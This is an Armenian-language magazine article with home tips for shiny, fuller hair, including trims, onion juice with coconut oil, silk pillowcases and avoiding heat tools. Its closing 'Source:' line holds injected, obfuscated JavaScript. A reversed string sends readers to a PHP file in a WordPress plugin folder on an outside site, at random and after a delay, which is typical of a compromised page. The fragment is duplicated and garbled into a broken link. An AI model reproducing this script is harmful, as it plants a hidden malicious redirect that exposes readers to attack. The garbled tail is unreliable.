Ինչպե՞ս մազերին հաղորդել գեղեցիկ փայլ և փարթամ տեսք

Իհարկե բոլորս էլ ցանկանում ենք ունենալ փարթամ և գեղեցիկ մազեր։ Դրա համար իրականում պարտադիր չէ օգտագործել հանրահայտ և թանկ խնամքի միջոցներ, քանի որ կան շատ պարզ և հասանելի հնարքներ, որոնց շնորհիվ մազերին կկարողանաք տալ գեղեցիկ փայլ և փարթամ տեսք։

Հաճախակի կտրեք մազերը

Երևի թե լսել եք մազերի պարբերաբար կտրելու անհրաժեշտության մասին: Այս ամենը շատ ցավալի է հնչում հատկապես, եթե պլանավորել եք երկարացնել ձեր մազերը:

Մազերը կտրելն իրականում ոչ միայն կօգնի ձեզ ազատվել ճյուղավորված ծայրերից, այլև դա կօգնի պահպանել մազերի առողջությունը: Եթե չկան ճյուղավորված ծայրեր, ապա մազերն էլ ավելի փարթամ տեսք են ունենում, քանի որ չեն կոտրատվում:

Դիմեք կախարդական բաղադրիչների օգնությանը

Խորհուրդ է տրվում մազերը նաև բնական նյութերով խնամել: Օրինակ կարող եք օգտագործել սոխի և սխտորի հյութը, հացահատիկը, խնձորի քացախը և կոկոսի կաթը, որոնք սնուցում են մազերը՝ հաղորդելով մազերին փարթամ տեսք և բարելավում մազերի աճը:

Օգտագործեք մետաքսե բարձ բամբակյա բարձի փոխարեն

Բամբակյա բարձի փոխարեն օգտագործեք մետաքսե կամ ատլասե բարձեր, որն անմիջականորեն նպաստում է մազերի աճին: Իրականում մետաքսե և ատլասե գործվածքների փափկությունը, ի տարբերություն բամբակի, ավելի օգտակար է ձեր մազերի համար: Մետաքսը կամ ատլասը չեն առաջացնում շփում, որի արդյունքում ձեր մազերն էլ ավելի քիչ է խճճվում և վնասվում։

Օգտագործեք սոխի հյութի և կոկոսի յուղի խառնուրդը

Երևի թե շատերիդ է հայտնի, որ սոխի հյութը մազերին թարմություն է հաղորդում: Այն կարգավորում է մազերի աճի ցիկլը և ուղղակիորեն սնուցում է մազի ֆոլիկուլին:

Երբ սոխի հյութը խառնվում է կոկոսի յուղի հետ, օգուտները կրկնապատկվում են: Կոկոսի յուղը օգնում է պահպանել մազերի շերտի բնական յուղերը՝ դրանով իսկ կանխելով չորությունը: Կոկոսի յուղը նաև վիտամին E-ի և լաուրաթթվի հարուստ աղբյուր է: Եթե չկարողանաք գտնել կոկոսի յուղ, կարող եք նաև օգտագործել նուշի կամ մանանեխի յուղ:

Զերծ մնացեք մազերի համար նախատեսված սարքերի օգտագործումից

Փորձեք հեռու մնալ մազերի համար նախատեսված գործիքներից, ինչպիսիք են՝ մազերի չորացուցիչները, ուղղիչներն ու գանգուրացնող սարքերը: Ցանկացած տեսակի ջերմություն վնասում է ձեր մազերը: Կարող եք օգտագործել մազի չորացուցիչն այն բանից հետո, երբ ձեր մազերը բնական եղանակով առնվազն 60% չորացած կլինեն:

Source: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-make-your-hair-longer-and-thicker-in-30-days-501110/”>BrightSide